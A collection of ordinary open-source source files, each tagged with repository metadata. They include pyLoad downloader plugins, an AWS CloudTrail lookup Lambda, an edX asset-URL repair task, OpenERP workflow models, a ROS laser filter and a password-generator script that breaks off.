old_children= zip(*(t.values() for t in trees))
children= [map_child(*cs) for cs in old_children ]
filtered_children= filter( lambda x: x is not cls.IGNORE_CHILD, children )
return cls( trees[0].name, filtered_children )
def reduce( self, reduce_f ):
return reduce(reduce_f, (c if DictTree._isleave(c) else c.reduce(reduce_f) for c in self.values()))
def __repr__(self):
return "{}({})".format(self.__class__.__name__, self.name)
| 4905ab/Keystroke_Dynamics_Accidentally_Kangaroo | Windows/#outed/core.py | Python | gpl-3.0 | 7,100 |
# -*- coding: utf-8 -*-
import re
import socket
import struct
import sys
from os import makedirs
from os.path import exists, join
from select import select
from time import time
from module.plugins.Hoster import Hoster
from module.utils import save_join
class Xdcc(Hoster):
__name__ = "Xdcc"
__type__ = "hoster"
__version__ = "0.32"
__config__ = [("nick", "str", "Nickname", "pyload"),
("ident", "str", "Ident", "pyloadident"),
("realname", "str", "Realname", "pyloadreal")]
__description__ = """Download from IRC XDCC bot"""
__license__ = "GPLv3"
__authors__ = [("jeix", "jeix@hasnomail.com")]
def setup(self):
self.debug = 0 # 0,1,2
self.timeout = 30
self.multiDL = False
def process(self, pyfile):
# change request type
self.req = pyfile.m.core.requestFactory.getRequest(self.__name__, type="XDCC")
self.pyfile = pyfile
for _i in xrange(0, 3):
try:
nmn = self.doDownload(pyfile.url)
self.logDebug("Download of %s finished." % nmn)
return
except socket.error, e:
if hasattr(e, "errno"):
errno = e.errno
else:
errno = e.args[0]
if errno == 10054:
self.logDebug("Server blocked our ip, retry in 5 min")
self.setWait(300)
self.wait()
continue
self.fail(_("Failed due to socket errors. Code: %d") % errno)
self.fail(_("Server blocked our ip, retry again later manually"))
def doDownload(self, url):
self.pyfile.setStatus("waiting") # real link
m = re.match(r'xdcc://(.*?)/#?(.*?)/(.*?)/#?(\d+)/?', url)
server = m.group(1)
chan = m.group(2)
bot = m.group(3)
pack = m.group(4)
nick = self.getConfig('nick')
ident = self.getConfig('ident')
real = self.getConfig('realname')
temp = server.split(':')
ln = len(temp)
if ln == 2:
host, port = temp
elif ln == 1:
host, port = temp[0], 6667
else:
self.fail(_("Invalid hostname for IRC Server: %s") % server)
#######################
# CONNECT TO IRC AND IDLE FOR REAL LINK
dl_time = time()
sock = socket.socket()
sock.connect((host, int(port)))
if nick == "pyload":
nick = "pyload-%d" % (time() % 1000) # last 3 digits
sock.send("NICK %s\r\n" % nick)
sock.send("USER %s %s bla :%s\r\n" % (ident, host, real))
self.setWait(3)
self.wait()
sock.send("JOIN #%s\r\n" % chan)
sock.send("PRIVMSG %s :xdcc send #%s\r\n" % (bot, pack))
# IRC recv loop
readbuffer = ""
done = False
retry = None
m = None
while True:
# done is set if we got our real link
if done:
break
if retry:
if time() > retry:
retry = None
dl_time = time()
sock.send("PRIVMSG %s :xdcc send #%s\r\n" % (bot, pack))
else:
if (dl_time + self.timeout) < time(): # todo: add in config
sock.send("QUIT :byebye\r\n")
sock.close()
self.fail(_("XDCC Bot did not answer"))
fdset = select([sock], [], [], 0)
if sock not in fdset[0]:
continue
readbuffer += sock.recv(1024)
temp = readbuffer.split("\n")
readbuffer = temp.pop()
for line in temp:
if self.debug is 2:
print "*> " + unicode(line, errors='ignore')
line = line.rstrip()
first = line.split()
if first[0] == "PING":
sock.send("PONG %s\r\n" % first[1])
if first[0] == "ERROR":
self.fail(_("IRC-Error: %s") % line)
msg = line.split(None, 3)
if len(msg) != 4:
continue
msg = {
"origin": msg[0][1:],
"action": msg[1],
"target": msg[2],
"text": msg[3][1:]
}
if nick == msg['target'][0:len(nick)] and "PRIVMSG" == msg['action']:
if msg['text'] == "\x01VERSION\x01":
self.logDebug("Sending CTCP VERSION")
sock.send("NOTICE %s :%s\r\n" % (msg['origin'], "pyLoad! IRC Interface"))
elif msg['text'] == "\x01TIME\x01":
self.logDebug("Sending CTCP TIME")
sock.send("NOTICE %s :%d\r\n" % (msg['origin'], time()))
elif msg['text'] == "\x01LAG\x01":
pass # don't know how to answer
if not (bot == msg['origin'][0:len(bot)]
and nick == msg['target'][0:len(nick)]
and msg['action'] in ("PRIVMSG", "NOTICE")):
continue
if self.debug is 1:
print "%s: %s" % (msg['origin'], msg['text'])
if "You already requested that pack" in msg['text']:
retry = time() + 300
if "you must be on a known channel to request a pack" in msg['text']:
self.fail(_("Wrong channel"))
m = re.match('\x01DCC SEND (.*?) (\d+) (\d+)(?: (\d+))?\x01', msg['text'])
if m:
done = True
# get connection data
ip = socket.inet_ntoa(struct.pack('L', socket.ntohl(int(m.group(2)))))
port = int(m.group(3))
packname = m.group(1)
if len(m.groups()) > 3:
self.req.filesize = int(m.group(4))
self.pyfile.name = packname
download_folder = self.config['general']['download_folder']
filename = save_join(download_folder, packname)
self.logInfo(_("Downloading %s from %s:%d") % (packname, ip, port))
self.pyfile.setStatus("downloading")
newname = self.req.download(ip, port, filename, sock, self.pyfile.setProgress)
if newname and newname != filename:
self.logInfo(_("%(name)s saved as %(newname)s") % {"name": self.pyfile.name, "newname": newname})
filename = newname
# kill IRC socket
# sock.send("QUIT :byebye\r\n")
sock.close()
self.lastDownload = filename
return self.lastDownload
| immenz/pyload | module/plugins/hoster/Xdcc.py | Python | gpl-3.0 | 6,756 |
import datetime
import collections
import boto3
cloudtrail = boto3.client('cloudtrail')
def lambda_handler(event, context):
account_id = event['account_id']
time_discovered = event['time_discovered']
username = event['username']
deleted_key = event['deleted_key']
exposed_location = event['exposed_location']
endtime = datetime.datetime.now() # Create start and end time for CloudTrail lookup
interval = datetime.timedelta(hours=24)
starttime = endtime - interval
print('Retrieving events...')
events = get_events(username, starttime, endtime)
print('Summarizing events...')
event_names, resource_names, resource_types = get_events_summaries(events)
return {
"account_id": account_id,
"time_discovered": time_discovered,
"username": username,
"deleted_key": deleted_key,
"exposed_location": exposed_location,
"event_names": event_names,
"resource_names": resource_names,
"resource_types": resource_types
}
def get_events(username, starttime, endtime):
""" Retrieves detailed list of CloudTrail events that occured between the specified time interval.
Args:
username (string): Username to lookup CloudTrail events for.
starttime(datetime): Start of interval to lookup CloudTrail events between.
endtime(datetime): End of interval to lookup CloudTrail events between.
Returns:
(dict)
Dictionary containing list of CloudTrail events occuring between the start and end time with detailed information for each event.
"""
try:
response = cloudtrail.lookup_events(
LookupAttributes=[
{
'AttributeKey': 'Username',
'AttributeValue': username
},
],
StartTime=starttime,
EndTime=endtime,
MaxResults=50
)
except Exception as e:
print(e)
print('Unable to retrieve CloudTrail events for user "{}"'.format(username))
raise(e)
return response
def get_events_summaries(events):
""" Summarizes CloudTrail events list by reducing into counters of occurences for each event, resource name, and resource type in list.
Args:
events (dict): Dictionary containing list of CloudTrail events to be summarized.
Returns:
(list, list, list)
Lists containing name:count tuples of most common occurences of events, resource names, and resource types in events list.
"""
event_name_counter = collections.Counter()
resource_name_counter = collections.Counter()
resource_type_counter = collections.Counter()
for event in events['Events']:
resources = event.get("Resources")
event_name_counter.update([event.get('EventName')])
if resources is not None:
resource_name_counter.update([resource.get("ResourceName") for resource in resources])
resource_type_counter.update([resource.get("ResourceType") for resource in resources])
return event_name_counter.most_common(10), resource_name_counter.most_common(10), resource_type_counter.most_common(10)
| robperc/Trusted-Advisor-Tools | ExposedAccessKeys/lambda_functions/lookup_cloudtrail_events.py | Python | apache-2.0 | 3,195 |
import json
import os
import re
from website.settings import GITHUB_API_TOKEN
from subprocess import check_output
GIT_LOGS_FILE = os.path.join('website', 'static', 'built', 'git_logs.json')
GIT_STATUS_FILE = os.path.join('website', 'static', 'built', 'git_branch.txt')
def gather_pr_data(current_branch='develop', master_branch='master'):
import requests
regex = re.compile(ur'\(#([\d]{4,})\)|Merge pull request #([\d]{4,})')
pr_data = []
headers = {
'Authorization': 'token %s' % GITHUB_API_TOKEN,
'media_type': 'application/vnd.github.VERSION.sha',
}
# GET /repos/:owner/:repo/compare/hubot:branchname...octocat:branchname
url_string = 'https://api.github.com/repos/centerforopenscience/osf.io/compare/{}...{}'
url = url_string.format(master_branch, current_branch)
res = requests.get(url, headers=headers)
if res.status_code == 200:
data = res.json()
commits = data['commits']
if commits:
commits.reverse()
index = 0
for item in commits:
index += 1
commit_message = item['commit']['message']
found_list = re.findall(regex, commit_message)
if found_list:
pr_one, pr_two = found_list[0]
pr = int(pr_one or pr_two)
pr_data.append(get_pr_data(pr))
return pr_data
def get_pr_data(pr):
import requests
headers = {
'Authorization': 'token %s' % GITHUB_API_TOKEN,
'media_type': 'application/vnd.github.VERSION.sha',
}
# GET /repos/:owner/:repo/pulls/:number
res = requests.get('https://api.github.com/repos/centerforopenscience/osf.io/pulls/{}'.format(pr),
headers=headers)
if res.status_code == 200:
return res.json()
else:
return {}
def main():
current_branch = check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).rstrip()
with open(GIT_STATUS_FILE, 'w') as f:
f.write(current_branch)
if GITHUB_API_TOKEN:
pr_data = json.dumps(gather_pr_data(current_branch))
with open(GIT_LOGS_FILE, 'w') as f:
f.write(pr_data)
if __name__ == '__main__':
main()
| jnayak1/osf.io | scripts/meta/gatherer.py | Python | apache-2.0 | 2,201 |
# -*- coding: utf-8 -*-
import json
import os
import time
import urllib.request
from pyload.core.network.http.http_request import FormFile
from pyload.core.utils import parse
from ..base.downloader import BaseDownloader
from ..helpers import exists
class LinksnappyComTorrent(BaseDownloader):
__name__ = "LinksnappyComTorrent"
__type__ = "downloader"
__version__ = "0.01"
__status__ = "testing"
__pattern__ = r'^unmatchable$'
__config__ = [
("enabled", "bool", "Activated", True),
("folder_per_package", "Default;Yes;No", "Create folder for each package", "Default"),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10),
("del_finished", "bool", "Delete downloaded torrents from the server", True)
]
__description__ = """Linksnappy.com torrents crypter plugin"""
__license__ = "GPLv3"
__authors__ = [("GammaC0de", "nitzo2001[AT}yahoo[DOT]com")]
API_URL = "https://linksnappy.com/api/"
def api_response(self, method, **kwargs):
return json.loads(self.load(self.API_URL + method,
get=kwargs))
def sleep(self, sec):
for _i in range(sec):
if self.pyfile.abort:
break
time.sleep(1)
def send_request_to_server(self):
""" Send torrent/magnet to the server """
if self.pyfile.url.endswith(".torrent"):
#: torrent URL
if self.pyfile.url.startswith("http"):
#: remote URL, download the torrent to tmp directory
api_data = self.api_response("torrents/ADDURL", url=self.pyfile.url).items()[0][1]
if api_data['status'] == "FAILED" and api_data['error'] != "This torrent already exists in your account":
self.fail(api_data['error'])
torrent_id = api_data['torrentid']
else:
#: URL is local torrent file (uploaded container)
torrent_filename = urllib.request.url2pathname(self.pyfile.url[7:]) #: trim the starting `file://`
if not exists(torrent_filename):
self.fail(self._("Torrent file does not exist"))
#: Check if the torrent file path is inside pyLoad's temp directory
if os.path.abspath(torrent_filename).startswith(self.pyload.tempdir + os.sep):
#: send the torrent content to the server
api_data = self.load("https://linksnappy.com/includes/ajaxupload.php",
post={'torrents[]': FormFile(torrent_filename, mimetype="application/octet-stream")},
multipart=True)
api_data = list(json.loads(api_data).items())[0][1]
if api_data['error'] and api_data['error'] != "This torrent already exists in your account":
self.fail(api_data['error'])
torrent_id = api_data['torrentid']
else:
self.fail(self._("Illegal URL")) #: We don't allow files outside pyLoad's temp directory
else:
#: magnet URL, send to the server
api_data = self.api_response("torrents/ADDMAGNET", magnetlinks=self.pyfile.url)
if api_data['status'] != "OK":
self.fail(api_data['error'])
api_data = api_data['return'][0]
if api_data['status'] != "OK" and api_data['error'] != "This torrent already exists in your account":
self.fail(api_data['error'])
torrent_id = api_data['torrentid']
return torrent_id
def wait_for_server_dl(self, torrent_id):
""" Show progress while the server does the download """
api_data = self.api_response("torrents/STATUS", tid=torrent_id)
if api_data['status'] != "OK":
self.fail(api_data['error'])
if api_data['return']['status'] == "ERROR":
self.fail(api_data['return']['error'])
self.pyfile.name = api_data['return']['name']
self.pyfile.set_custom_status("torrent")
self.pyfile.set_progress(0)
if api_data['return']['status'] != "FINISHED":
api_data = self.api_response("torrents/START", tid=torrent_id)
if api_data['status'] != "OK":
if api_data['error'] == "Magnet URI processing in progress. Please wait.":
for _i in range(8):
self.sleep(3)
api_data = self.api_response("torrents/START", tid=torrent_id)
if api_data['status'] == "OK":
break
else:
self.fail(api_data['error'])
elif api_data['error'] != "Already started.":
self.fail(api_data['error'])
while True:
api_data = self.api_response("torrents/STATUS", tid=torrent_id)
if api_data['status'] != "OK":
self.fail(api_data['error'])
if api_data['return']['status'] == "ERROR":
self.fail(api_data['return']['error'])
torrent_size = api_data['return'].get('getSize')
if torrent_size is not None and self.pyfile.size == 0:
self.pyfile.size = parse.bytesize(torrent_size)
progress = int(api_data['return']['percentDone'])
self.pyfile.set_progress(progress)
if api_data['return']['status'] == "FINISHED":
break
self.sleep(2)
self.pyfile.set_progress(100)
self.sleep(1)
self.pyfile.set_custom_status("makezip")
self.pyfile.set_progress(0)
while True:
api_data = self.api_response("torrents/GENZIP", torrentid=torrent_id)
if api_data['status'] == "ERROR":
self.fail(api_data['error'])
elif api_data['status'] == "PENDING":
self.sleep(2)
else:
break
self.pyfile.set_progress(100)
return api_data['return']
def delete_torrent_from_server(self, torrent_id):
""" Remove the torrent from the server """
self.api_response("torrents/DELETETORRENT", tid=torrent_id, delFiles=1)
def setup(self):
self.multiDL = True
self.resume_download = True
self.chunk_limit = 1
if 'LinksnappyCom' not in self.pyload.account_manager.plugins:
self.fail(self._("This plugin requires an active Linksnappy.com account"))
self.account = self.pyload.account_manager.get_account_plugin("LinksnappyCom")
if len(self.account.accounts) == 0:
self.fail(self._("This plugin requires an active Linksnappy.com account"))
self.load_account()
#: Use the cookiejar of account plugin (for the logged on session cookie)
cj = self.pyload.request_factory.get_cookie_jar("LinksnappyCom", self.account.user)
self.req.set_cookie_jar(cj)
def process(self, pyfile):
torrent_id = False
try:
torrent_id = self.send_request_to_server()
torrent_url = self.wait_for_server_dl(torrent_id)
self.pyfile.name = os.path.basename(torrent_url)
self.download(torrent_url)
finally:
if torrent_id is not False and self.config.get("del_finished"):
self.delete_torrent_from_server(torrent_id)
| vuolter/pyload | src/pyload/plugins/downloaders/LinksnappyComTorrent.py | Python | agpl-3.0 | 7,604 |
import csv
import datetime
import logging
import re
from io import StringIO
from urllib.parse import urljoin, urlparse
import pymongo
from bson.son import SON
from celery.task import Task, task
from django.conf import settings
from django.core.mail import EmailMessage
from django.db.models import Q
from django.utils.html import strip_tags
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.content.block_structure.api import update_course_in_cache
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from pytz import UTC
from xmodule.assetstore.assetmgr import AssetManager
from xmodule.contentstore.content import StaticContent
from xmodule.exceptions import NotFoundError
from xmodule.modulestore import InvalidLocationError
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import ItemNotFoundError
from xmodule.modulestore.mongo.base import MongoRevisionKey
log = logging.getLogger(__name__)
store = modulestore()
URL_RE = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
class AssetURLsTask(Task):
def on_success(self, result, task_id, args, kwargs):
email_ids = kwargs.get('email_ids')
update_script = kwargs.get('update')
if update_script:
headers = ['Asset', 'Course', 'Module', 'Updated']
else:
headers = ['Asset', 'Course', 'Module', 'Available']
rows = []
for course, assets in result.items():
for asset in assets:
rows.append([
asset.get('name'), course, asset.get('module'),
asset.get('available') == True
])
assets_report = StringIO()
writer = csv.writer(assets_report)
writer.writerow(headers)
for row in rows:
writer.writerow(row)
subject = '{} assets with incorrect urls task completed'.format('Update' if update_script else 'Get')
email = EmailMessage(subject, '', settings.DEFAULT_FROM_EMAIL, email_ids)
email.attach('platform_assets_report.csv', assets_report.getvalue(), 'text/csv')
email.send(fail_silently=False)
def update_courses_cache(course_ids):
"""
Updates course cache so API returns updated data
"""
for course_id in course_ids:
course_key = CourseKey.from_string(course_id)
try:
update_course_in_cache(course_key)
except:
continue
def get_block_location(studio_url, course_id, block):
"""
Create appropriate studio urls
"""
category = block.get('_id', {}).get('category')
name = block.get('_id', {}).get('name')
if category == 'about' and name == 'overview':
block_url = '{domain}/settings/details/{course_id}'.format(
domain=studio_url,
course_id=course_id
)
elif category == 'static_tab':
block_url = '{domain}/tabs/{course_id}'.format(
domain=studio_url,
course_id=course_id
)
elif category == 'course_info' and name == 'updates':
block_url = '{domain}/course_info/{course_id}'.format(
domain=studio_url,
course_id=course_id
)
else:
block_url = '{domain}/container/i4x://{org}/{course}/{category}/{name}'.format(
domain=studio_url,
org=block.get('_id', {}).get('org'),
course=block.get('_id', {}).get('course'),
category=category,
name=name
)
return block_url
@task(
name='lms.djangoapps.api_integration.tasks.get_assets_with_incorrect_urls',
bind=True,
base=AssetURLsTask
)
def get_assets_with_incorrect_urls(
self, course_ids, course_type, email_ids,
environment, studio_url, staff_user_id, update
):
task_id = self.request.id
if not course_ids:
if course_type == 'close':
course_ids = CourseOverview.objects.filter(
Q(end__lte=datetime.datetime.today().replace(tzinfo=UTC))
).values_list('id', flat=True)
else:
course_ids = CourseOverview.objects.filter(
Q(end__gte=datetime.datetime.today().replace(tzinfo=UTC)) |
Q(end__isnull=True)
).values_list('id', flat=True)
courses_assets = dict()
for course_id in course_ids:
course_assets = find_asset_urls_in_course(task_id, course_id, environment, studio_url, staff_user_id, update)
if course_assets:
courses_assets[course_id] = course_assets
if update:
update_courses_cache(course_ids)
return courses_assets
def find_asset_urls_in_course(task_id, course_id, environment, studio_url, staff_user_id, update):
course_key = CourseKey.from_string(course_id)
query = SON([
('_id.tag', 'i4x'),
('_id.org', course_key.org),
('_id.course', course_key.course),
('_id.revision', MongoRevisionKey.published),
])
_store = store._get_modulestore_for_courselike(course_key)
# split_mongo based courses are not supported
if not hasattr(_store, 'collection'):
return []
blocks = list(_store.collection.find(
query,
sort=[('_id.revision', pymongo.DESCENDING)],
))
course_assets = []
blocks_to_update = []
for block in blocks:
block_loc = get_block_location(
studio_url=studio_url,
course_id=course_id,
block=block
)
block_assets = list()
_find_asset_urls_in_block(
task_id, block, block_loc, block_assets, course_key,
environment, staff_user_id, update
)
if block_assets:
course_assets.extend(block_assets)
blocks_to_update.append(block)
if update:
if blocks_to_update:
for module in _store._load_items(course_key, blocks_to_update):
if hasattr(module.parent, 'block_id'):
block_loc = module.parent.block_id
else:
block_loc = module.location
try:
store.update_item(xblock=module, user_id=staff_user_id)
except:
log.info('[{}] Error updating module `{}` in course `{}`. Skipping..'
.format(task_id, block_loc, course_id))
continue
return course_assets
def _find_asset_urls_in_block(
task_id, value, block_loc,
block_assets, course_key,
environment, staff_user_id,
update,
dictionary=None,
value_key=None,
):
if type(value) == dict:
for key, val in value.items():
_find_asset_urls_in_block(
task_id, val, block_loc, block_assets,
course_key, environment, staff_user_id, update,
dictionary=value, value_key=key
)
elif type(value) == list:
for item in value:
_find_asset_urls_in_block(
task_id, item, block_loc, block_assets,
course_key, environment, staff_user_id, update,
dictionary=dictionary, value_key=value_key
)
elif type(value) in (str, str):
save_updated = False
urls = re.findall(URL_RE, value)
for url in urls:
url = strip_tags(url)
parsed_url = urlparse(url)
asset_url = StaticContent.ASSET_URL_RE.match(parsed_url.path)
if asset_url is not None:
# check if asset URL belongs to some other server or course
if parsed_url.hostname != environment or \
asset_url.groupdict().get('course') != course_key.course or \
asset_url.groupdict().get('org') != course_key.org:
asset_info = {'name': asset_url.groupdict().get('name'), 'module':block_loc, 'available': False}
asset_path = '{}{}'.format(
StaticContent.get_base_url_path_for_course_assets(course_key),
asset_url.groupdict().get('name')
)
# check if asset exists in this course
try:
loc = StaticContent.get_location_from_path(asset_path)
except (InvalidLocationError, InvalidKeyError):
pass
else:
try:
AssetManager.find(loc, as_stream=True)
except (ItemNotFoundError, NotFoundError):
pass
else:
asset_info['available'] = True
if update:
# replace url with the `asset_path`
full_asset_path = urljoin('https://{}'.format(environment), asset_path)
value = value.replace(url, full_asset_path, 1)
save_updated = True
log.info('[{}] Replacing `{}` with new path `{}` in module `{}`'
.format(task_id, url, full_asset_path, block_loc))
block_assets.append(asset_info)
if urls and save_updated and update:
dictionary[value_key] = value
| edx-solutions/api-integration | edx_solutions_api_integration/tasks/get_assets_with_incorrect_urls.py | Python | agpl-3.0 | 9,506 |
from brightness_vars import *
from models import *
from step_algorithms import *
from chain_generators import *
| HIPS/firefly-monte-carlo | flymc/__init__.py | Python | mit | 112 |
#!/usr/bin/env python
import rospy
from sensor_msgs.msg import LaserScan
def callback(data):
# Option 1) Conform data to specified input/output ranges
# data.ranges = [data.range_max if range_val>data.range_max else (data.range_min if range_val<data.range_min else range_val) for range_val in data.ranges]
# data.ranges = [data.range_max if range_val>data.range_max else (data.range_max if range_val<data.range_min else range_val) for range_val in data.ranges]
data.ranges = [
4.9
if range_val > data.range_max
else (4.9 if range_val < data.range_min else range_val)
for range_val in data.ranges
]
# Option 2) Conform input/output ranges to data
# IF I set the max to a number, then I have to comment these out,
# Lest the max always be whatever I set it to above!
# data.range_max = max(data.range_max,max(data.ranges))
# data.range_min = min(data.range_min,min(data.ranges))
pub.publish(data)
# Intializes everything
def start():
rospy.init_node("laser_filter")
scan_topic = rospy.get_param("~scan_topic", "xv11")
global pub
pub = rospy.Publisher(scan_topic + "_filtered", LaserScan, queue_size=10)
rospy.Subscriber(scan_topic, LaserScan, callback)
rospy.spin()
if __name__ == "__main__":
start()
| chrisl8/ArloBot | arlobot_ros/scripts/laser_filter.py | Python | mit | 1,311 |
from . import test_stock_orderpoint_move_link
| OCA/stock-logistics-warehouse | stock_orderpoint_move_link/tests/__init__.py | Python | agpl-3.0 | 46 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp import netsvc
class workflow(osv.osv):
_name = "workflow"
_table = "wkf"
_order = "name"
_columns = {
'name': fields.char('Name', size=64, required=True),
'osv': fields.char('Resource Object', size=64, required=True,select=True),
'on_create': fields.boolean('On Create', select=True),
'activities': fields.one2many('workflow.activity', 'wkf_id', 'Activities'),
}
_defaults = {
'on_create': lambda *a: True
}
def write(self, cr, user, ids, vals, context=None):
if not context:
context={}
wf_service = netsvc.LocalService("workflow")
wf_service.clear_cache(cr, user)
return super(workflow, self).write(cr, user, ids, vals, context=context)
def get_active_workitems(self, cr, uid, res, res_id, context=None):
cr.execute('select * from wkf where osv=%s limit 1',(res,))
wkfinfo = cr.dictfetchone()
workitems = []
if wkfinfo:
cr.execute('SELECT id FROM wkf_instance \
WHERE res_id=%s AND wkf_id=%s \
ORDER BY state LIMIT 1',
(res_id, wkfinfo['id']))
inst_id = cr.fetchone()
cr.execute('select act_id,count(*) from wkf_workitem where inst_id=%s group by act_id', (inst_id,))
workitems = dict(cr.fetchall())
return {'wkf': wkfinfo, 'workitems': workitems}
def create(self, cr, user, vals, context=None):
if not context:
context={}
wf_service = netsvc.LocalService("workflow")
wf_service.clear_cache(cr, user)
return super(workflow, self).create(cr, user, vals, context=context)
workflow()
class wkf_activity(osv.osv):
_name = "workflow.activity"
_table = "wkf_activity"
_order = "name"
_columns = {
'name': fields.char('Name', size=64, required=True),
'wkf_id': fields.many2one('workflow', 'Workflow', required=True, select=True, ondelete='cascade'),
'split_mode': fields.selection([('XOR', 'Xor'), ('OR','Or'), ('AND','And')], 'Split Mode', size=3, required=True),
'join_mode': fields.selection([('XOR', 'Xor'), ('AND', 'And')], 'Join Mode', size=3, required=True),
'kind': fields.selection([('dummy', 'Dummy'), ('function', 'Function'), ('subflow', 'Subflow'), ('stopall', 'Stop All')], 'Kind', size=64, required=True),
'action': fields.text('Python Action'),
'action_id': fields.many2one('ir.actions.server', 'Server Action', ondelete='set null'),
'flow_start': fields.boolean('Flow Start'),
'flow_stop': fields.boolean('Flow Stop'),
'subflow_id': fields.many2one('workflow', 'Subflow'),
'signal_send': fields.char('Signal (subflow.*)', size=32),
'out_transitions': fields.one2many('workflow.transition', 'act_from', 'Outgoing Transitions'),
'in_transitions': fields.one2many('workflow.transition', 'act_to', 'Incoming Transitions'),
}
_defaults = {
'kind': lambda *a: 'dummy',
'join_mode': lambda *a: 'XOR',
'split_mode': lambda *a: 'XOR',
}
def unlink(self, cr, uid, ids, context=None):
if context is None: context = {}
if not context.get('_force_unlink') and self.pool.get('workflow.workitem').search(cr, uid, [('act_id', 'in', ids)]):
raise osv.except_osv(_('Operation forbidden'),
_('Please make sure no workitems refer to an activity before deleting it!'))
super(wkf_activity, self).unlink(cr, uid, ids, context=context)
wkf_activity()
class wkf_transition(osv.osv):
_table = "wkf_transition"
_name = "workflow.transition"
_rec_name = 'signal'
_columns = {
'trigger_model': fields.char('Trigger Object', size=128),
'trigger_expr_id': fields.char('Trigger Expression', size=128),
'signal': fields.char('Signal (Button Name)', size=64,
help="When the operation of transition comes from a button pressed in the client form, "\
"signal tests the name of the pressed button. If signal is NULL, no button is necessary to validate this transition."),
'group_id': fields.many2one('res.groups', 'Group Required',
help="The group that a user must have to be authorized to validate this transition."),
'condition': fields.char('Condition', required=True, size=128,
help="Expression to be satisfied if we want the transition done."),
'act_from': fields.many2one('workflow.activity', 'Source Activity', required=True, select=True, ondelete='cascade',
help="Source activity. When this activity is over, the condition is tested to determine if we can start the ACT_TO activity."),
'act_to': fields.many2one('workflow.activity', 'Destination Activity', required=True, select=True, ondelete='cascade',
help="The destination activity."),
'wkf_id': fields.related('act_from','wkf_id', type='many2one', relation='workflow', string='Workflow', select=True),
}
_defaults = {
'condition': lambda *a: 'True',
}
wkf_transition()
class wkf_instance(osv.osv):
_table = "wkf_instance"
_name = "workflow.instance"
_rec_name = 'res_type'
_log_access = False
_columns = {
'wkf_id': fields.many2one('workflow', 'Workflow', ondelete='cascade', select=True),
'res_id': fields.integer('Resource ID'),
'res_type': fields.char('Resource Object', size=64),
'state': fields.char('Status', size=32),
}
def _auto_init(self, cr, context=None):
super(wkf_instance, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'wkf_instance_res_type_res_id_state_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX wkf_instance_res_type_res_id_state_index ON wkf_instance (res_type, res_id, state)')
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'wkf_instance_res_id_wkf_id_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX wkf_instance_res_id_wkf_id_index ON wkf_instance (res_id, wkf_id)')
wkf_instance()
class wkf_workitem(osv.osv):
_table = "wkf_workitem"
_name = "workflow.workitem"
_log_access = False
_rec_name = 'state'
_columns = {
'act_id': fields.many2one('workflow.activity', 'Activity', required=True, ondelete="cascade", select=True),
'wkf_id': fields.related('act_id','wkf_id', type='many2one', relation='workflow', string='Workflow'),
'subflow_id': fields.many2one('workflow.instance', 'Subflow', ondelete="cascade", select=True),
'inst_id': fields.many2one('workflow.instance', 'Instance', required=True, ondelete="cascade", select=True),
'state': fields.char('Status', size=64, select=True),
}
wkf_workitem()
class wkf_triggers(osv.osv):
_table = "wkf_triggers"
_name = "workflow.triggers"
_log_access = False
_columns = {
'res_id': fields.integer('Resource ID', size=128),
'model': fields.char('Object', size=128),
'instance_id': fields.many2one('workflow.instance', 'Destination Instance', ondelete="cascade"),
'workitem_id': fields.many2one('workflow.workitem', 'Workitem', required=True, ondelete="cascade"),
}
def _auto_init(self, cr, context=None):
super(wkf_triggers, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'wkf_triggers_res_id_model_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX wkf_triggers_res_id_model_index ON wkf_triggers (res_id, model)')
wkf_triggers()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| tedi3231/openerp | openerp/addons/base/ir/workflow/workflow.py | Python | agpl-3.0 | 8,979 |
from haystack import indexes
from haystack import site
from dinette.models import Ftopics, Reply, DinetteUserProfile
class TopicIndex(indexes.SearchIndex):
text = indexes.CharField(document=True, use_template=True)
subject = indexes.CharField(model_attr="subject")
message = indexes.CharField(model_attr="_message_rendered")
class ReplyIndex(indexes.SearchIndex):
text = indexes.CharField(document=True, use_template=True)
message = indexes.CharField(model_attr="_message_rendered")
class UserprofileIndex(indexes.SearchIndex):
text = indexes.CharField(document=True, use_template=True)
username = indexes.CharField(model_attr="username")
first_name = indexes.CharField(model_attr="first_name")
last_name = indexes.CharField(model_attr="last_name")
site.register(Ftopics, TopicIndex)
site.register(Reply, ReplyIndex)
site.register(DinetteUserProfile, UserprofileIndex)
| agiliq/Dinette | dinette/search_indexes.py | Python | bsd-3-clause | 922 |
# -*- coding: utf-8 -*-
from django.dispatch import Signal
post_ondelta_signal = Signal(providing_args=['fields_changed', 'instance'])
| adamhaney/django-ondelta | ondelta/signals.py | Python | mit | 136 |
#!/usr/bin/env python
"""
A simple script for making random passwords, WITHOUT 1,l,O,0. Because
those characters are hard to tell the difference between in some fonts.
"""
#Import Modules
import sys
from random import Random
rng = Random()
righthand = '23456qwertasdfgzxcvbQWERTASDFGZXCVB'
lefthand = '789yuiophjknmYUIPHJKLNM'
allchars = righthand + lefthand
try:
passwordLength = int(sys.argv[1])
except:
#user didn't specify a length. that's ok, just use 8
passwordLength = 8
try:
